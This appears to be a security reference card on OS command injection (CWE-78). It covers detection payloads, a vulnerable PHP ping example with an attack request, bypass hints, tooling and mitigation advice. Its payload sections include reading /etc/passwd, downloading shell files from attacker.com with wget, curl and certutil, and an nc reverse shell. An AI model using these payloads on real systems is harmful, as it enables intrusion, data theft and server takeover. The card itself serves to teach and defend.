Critical Severity | OWASP A03:2021
🔴 OS Command Injection
🧠 Description
What is Command Injection?
OS Command Injection allows attackers to execute arbitrary operating system commands on the server. It occurs when an application passes unsafe user input to a system shell.
Command Injection allows attackers to:
- Execute arbitrary OS commands
- Read/write files
- Escalate privileges
- Access sensitive data
- Pivot to internal network
- Install malware
🏷️ Classification
- Type: OS Command Injection (CWE-78)
- OWASP: A03:2021 - Injection
- Types: Direct shell execution, Code injection, Shell metacharacters
🎯 Attack Surface
- ✅ Ping functionality
- ✅ Traceroute functionality
- ✅ DNS lookup
- ✅ File processing (ffmpeg, ImageMagick)
- ✅ PDF generators
- ✅ Email forms
⚠️ Preconditions
- Application executes system commands
- User input used in command without sanitization
- No input validation or sanitization
🔍 Detection
Test Payloads:
; whoami| whoami& whoami`whoami`$(whoami)
🔧 Burp Suite Workflow
- Find parameter that might execute commands
- Inject test command:
; whoami - Check output for command execution
- Escalate to full shell access
⚙️ Tool Automation
Commix
Automatic command injection
Burp Suite
Manual testing
nuclei
Command injection templates
# commix python commix.py --url="http://target.com/vuln?param=test" # nuclei nuclei -u "http://target.com" -t templates/cmdi.yaml
💣 Basic Payloads
🔧 Shell Metacharacters
; whoami
| whoami
& whoami
&& whoami
|| whoami
\n whoami
🔧 Command Substitution
`whoami`
$(whoami)
${IFS}whoami
🚀 Advanced Payloads
🐧 Linux
; cat /etc/passwd
; ls -la /var/www
; wget http://attacker.com/shell.sh
🪟 Windows
type C:\\Windows\\win.ini
dir C:\\
certutil -urlcache -f http://attacker.com/shell.exe
🌐 Network
; curl -o /tmp/shell http://attacker.com/shell
; nc -e /bin/sh attacker.com 4444
📝 Proof of Concept
# Vulnerable PHP code
$host = $_GET['host'];
system("ping -c 1 " . $host);
# Attack:
GET /ping?host=127.0.0.1;whoami
# Output: uid=33(www-data) gid=33(www-data)
💥 Impact Analysis
Severity: CRITICAL (CVSS 10.0)
- Full server compromise
- Data breach
- Malware installation
- Pivot to internal network
- Complete system takeover
🔗 Attack Chains
Chain: Command Injection to RCE
- Find command injection point
- Inject reverse shell
- Gain shell access
- Escalate privileges
🛡️ Mitigation
✅ Avoid Shell Commands: Use APIs instead of system()
✅ Input Validation: Whitelist allowed characters
✅ Sandbox: Run commands in isolated environment
✅ Escape: Properly escape user input
✅ Input Validation: Whitelist allowed characters
✅ Sandbox: Run commands in isolated environment
✅ Escape: Properly escape user input
🏰 Advanced Mitigation
# Python - Use subprocess without shell import subprocess subprocess.run(['ping', '-c', '1', host]) # No shell=True # Use exec module instead of shell # Avoid: os.system(), shell_exec(), exec()
📊 Monitoring & Detection
- Alert on shell metacharacters in logs
- Monitor for system command execution
- Detect unusual process execution
🔐 Security Controls
| Control | Implementation |
|---|---|
| No Shell Commands | Use APIs instead of system() |
| Input Validation | Whitelist allowed chars |
| Sandboxing | Containerize applications |
🔓 Bypass Techniques
Use newlines to bypass filters
Environment variable injection
Use base64 encoding
🛠️ Tools & Commands
Commix
Automated command injection
Metasploit
exploit/unix/http/vulnerable
📚 References
🔄 Retest Steps
| Step | Action |
|---|---|
| 1 | Replace system() with API |
| 2 | Re-test with ; whoami |
| 3 | Verify no command execution |
⚙️ Detection Logic
Static: Find system(), exec() calls. Dynamic: Fuzz with command injection payloads.
🔎 Threat-Hunting
IOCs: Shell metacharacters in parameters, unusual process execution.
🛡️ Defensive
WAF rules, RASP, proper input validation.